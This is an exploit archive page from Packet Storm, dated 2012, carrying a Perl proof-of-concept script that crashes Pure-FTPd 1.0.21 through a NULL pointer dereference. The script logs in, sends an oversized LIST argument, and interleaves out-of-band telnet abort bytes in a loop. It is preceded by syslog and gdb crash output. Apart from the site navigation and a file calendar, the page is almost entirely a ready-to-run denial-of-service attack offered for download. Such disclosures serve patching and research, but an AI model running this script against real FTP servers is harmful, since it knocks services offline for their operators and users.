exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pure-FTPd 1.0.21 Denial Of Service

Pure-FTPd 1.0.21 Denial Of Service
Posted Aug 14, 2012
Authored by Kingcope

Pure-FTPd version 1.0.21 crash proof of concept exploit that leverages a NULL pointer dereference.

tags | exploit, proof of concept
SHA-256 | c2280992211c9ea41ac2e2ddf61f4ee7e7455a52f000ddfb5f9302a7a81ccbc0

Pure-FTPd 1.0.21 Denial Of Service

Change Mirror Download
#Pure-FTPd Crash PoC (Null Pointer Dereference), tested with pure-ftpd v1.0.21 (centos 6.2, ubuntu 8.04)
#latest version (v1.0.36) is not affected !!
#discovered by Kingcope
#
#root@ubuntu:~# grep seg /var/log/syslog
#Aug 13 13:55:28 ubuntu kernel: [ 226.791747] pure-ftpd[4825]: segfault at 00000000 eip 0804cd3b esp bfb81db0 error 4
#Aug 13 13:56:21 ubuntu kernel: [ 280.295826] pure-ftpd[4836]: segfault at 00000000 eip 0804cd3b esp bfb81db0 error 4
#Program received signal SIGSEGV, Segmentation fault.
#[Switching to process 5358]
#doreply () at ftpd.c:698
#698 nextentry = scannedentry->next;
#(gdb) i r
#eax 0x0 0
#ecx 0xbf967540 -1080658624
#edx 0x0 0
#ebx 0x0 0
#esp 0xbf967540 0xbf967540
#ebp 0xbf967588 0xbf967588
#esi 0x0 0
#edi 0xbf96756c -1080658580
#eip 0x804b090 0x804b090 <doreply+256>
#eflags 0x10217 [ CF PF AF IF RF ]
#cs 0x73 115
#ss 0x7b 123
#ds 0x7b 123
#es 0x7b 123
#fs 0x0 0
#gs 0x33 51
#(gdb) x/10i $eip
#=> 0x804b090 <doreply+256>: mov (%eax),%ebx
# 0x804b092 <doreply+258>: mov %eax,(%esp)
# 0x804b095 <doreply+261>: call 0x8049928 <free@plt>
# 0x804b09a <doreply+266>: test %ebx,%ebx
# 0x804b09c <doreply+268>: mov %ebx,%eax
# 0x804b09e <doreply+270>: jne 0x804b090 <doreply+256>
# 0x804b0a0 <doreply+272>: movl $0x0,0x805d040
# 0x804b0aa <doreply+282>: movl $0x0,0x805d03c
# 0x804b0b4 <doreply+292>: add $0x3c,%esp
# 0x804b0b7 <doreply+295>: pop %ebx
#(gdb)

use IO::Socket;

$host = $ARGV[0];
$username = $ARGV[1];
$password = $ARGV[2];
$locip = $ARGV[3];
$locip =~ s/\./,/gi;

if (($host eq "") or ($username eq "") or ($password eq "") or ($locip eq "")) {
print "Usage: POC.pl <hostname> <username> <password> <localip>\n";
exit;
}

if (fork()) {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => 21,
Proto => 'tcp');
while(<$sock>) {
$p = $_;
print $p;
if ($p =~ /220\s/) {
last;
}

}
print $sock "USER $ARGV[1]\r\n";
$p = <$sock>;
print $p;
print $sock "PASS $ARGV[2]\r\n";
$p = <$sock>;
print $p;
for ($k=0;$k<100;$k++) {
print $k."\n";
print $sock "PORT $locip,146,15\r\n";
$p = <$sock>;
print $p;
$a = "A" x 2560;
print $sock "LIST $a\r\n";
select(undef,undef,undef,k*0.001); # TWEAK THIS VALUE, USED A HOST TO VM CONNECTION WHEN TESTING
send $sock, "!",MSG_OOB;
print $sock "\377";
print $sock "\364";
print $sock "\377";
print $sock "\362";
print $sock "ABOR\r\n";
$p = <$sock>;
print $p;
print $sock "PWD\r\n";
$p = <$sock>;
print $p;
}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => 37391, Proto => 'tcp', Listen => 1000);
die "Could not create socket: $!\n" unless $servsock;
while(my $new_sock = $servsock->accept()) {
while(<$new_sock>) {
print $_;
}
}
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close